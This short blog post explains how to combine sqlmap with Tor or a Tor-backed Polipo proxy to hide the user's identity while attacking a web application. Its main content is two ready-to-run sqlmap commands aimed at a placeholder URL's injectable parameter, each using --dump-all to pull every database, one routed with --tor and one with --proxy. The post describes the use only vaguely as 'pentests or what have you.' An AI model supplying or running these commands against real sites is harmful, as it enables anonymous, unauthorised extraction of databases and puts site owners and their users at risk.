So I've previously made posts about things like tor and sqlmap, but I just wanted to make this quick post to show that you can combine the two in order to increase anonymity when doing pentests or what have you. So assuming you have TOR up and running with default settings, if not you can find a how-to here, we will use sqlmap's --tor flag.
python sqlmap.py -u www.example.com/fuckmonsanto.php?prodID=23 --beep --eta --tor --dump-all
or if you're not using TOR or simply having issues, you can use the proxy flag instead. I'll be using polipo, which is utilizing tor, so I will be using my localhost and port 8123 which is the default port used by polipo. You could alternatively use a proxy off the web.
sqlmap -u www.example.com/fuckmonsanto.php?prodID=23 --beep --eta --proxy=http://127.0.0.1:8123 --dump-all
It's sadly as simply as that.
No comments:
Post a Comment